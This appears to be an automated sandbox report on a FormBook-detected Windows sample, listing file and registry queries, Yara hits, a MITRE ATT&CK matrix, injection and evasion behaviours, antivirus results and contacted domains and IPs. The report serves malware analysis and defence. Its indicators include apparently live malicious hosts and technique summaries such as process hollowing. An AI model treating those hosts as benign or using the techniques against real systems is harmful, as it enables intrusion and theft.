            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383848 Sample: hvEop8Y70Y.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.adamspartnership.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 7 other signatures 2->45 11 hvEop8Y70Y.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\hvEop8Y70Y.exe.log, ASCII 11->29 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Injects a PE file into a foreign processes 11->57 15 hvEop8Y70Y.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.cqsjny.com 198.148.114.222, 49732, 80 MULTA-ASN1US United States 18->33 35 www.aa29996.com 147.255.37.207, 49721, 80 LEASEWEB-USA-LAX-11US United States 18->35 37 12 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 raserver.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            hvEop8Y70Y.exe26%VirustotalBrowse
            hvEop8Y70Y.exe29%ReversingLabsWin32.Trojan.AgentTesla
            hvEop8Y70Y.exe100%AviraHEUR/AGEN.1138557
            hvEop8Y70Y.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.0.hvEop8Y70Y.exe.9a0000.0.unpack100%AviraHEUR/AGEN.1138557Download File
            4.2.hvEop8Y70Y.exe.9a0000.1.unpack100%AviraHEUR/AGEN.1138557Download File
            4.2.hvEop8Y70Y.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.0.hvEop8Y70Y.exe.8b0000.0.unpack100%AviraHEUR/AGEN.1138557Download File
            0.2.hvEop8Y70Y.exe.8b0000.0.unpack100%AviraHEUR/AGEN.1138557Download File

            Domains

            SourceDetectionScannerLabelLink
            www.cqsjny.com0%VirustotalBrowse
            www.betbonusuk.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com20%Avira URL Cloudsafe
            http://www.sandoll.co.krndo0%Avira URL Cloudsafe
            http://tempuri.org/GridOneHSDataSet.xsd0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.comI0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G#Por0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ana0%Avira URL Cloudsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.founder.com.cn/cnd0%URL Reputationsafe
            http://www.founder.com.cn/cnd0%URL Reputationsafe
            http://www.founder.com.cn/cnd0%URL Reputationsafe
            http://tempuri.org/HighScoresDataSet.xsd0%Avira URL Cloudsafe
            http://www.sajatypeworks.comte0%Avira URL Cloudsafe
            www.okitmall.com/iu4d/0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/omh#?oy0%Avira URL Cloudsafe
            http://www.fonts.comX0%URL Reputationsafe
            http://www.fonts.comX0%URL Reputationsafe
            http://www.fonts.comX0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/rpor0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/6#0%Avira URL Cloudsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/aali0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/L#Ko0%Avira URL Cloudsafe
            http://www.tiro.comc0%Avira URL Cloudsafe
            http://www.fonts.comcj0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/Li0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/h#wo00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.cqsjny.com
            		198.148.114.222
            		truetrueunknown
            www.betbonusuk.com
            		172.67.187.138
            		truetrueunknown
            www.getboostphlo.com
            		172.67.219.254
            		truetrue
              		unknown
              www.aa29996.com
              		147.255.37.207
              		truetrue
                		unknown
                runcouver.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.ux300e.com
                  		52.58.78.16
                  		truetrue
                    		unknown
                    mvprunning.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.adamspartnership.com
                      		138.197.103.178
                      		truefalse
                        		unknown
                        www.okitmall.com
                        		15.165.26.252
                        		truetrue
                          		unknown
                          yashaerotech.com
                          		34.102.136.180
                          		truefalse
                            		unknown
                            www.gmopanama.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.yashaerotech.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.morrealeestates.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.mvprunning.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.runcouver.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      www.okitmall.com/iu4d/true
                                      • Avira URL Cloud: safe
                                      		low

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.fontbureau.com/designersGhvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/?hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpfalse
                                          		high
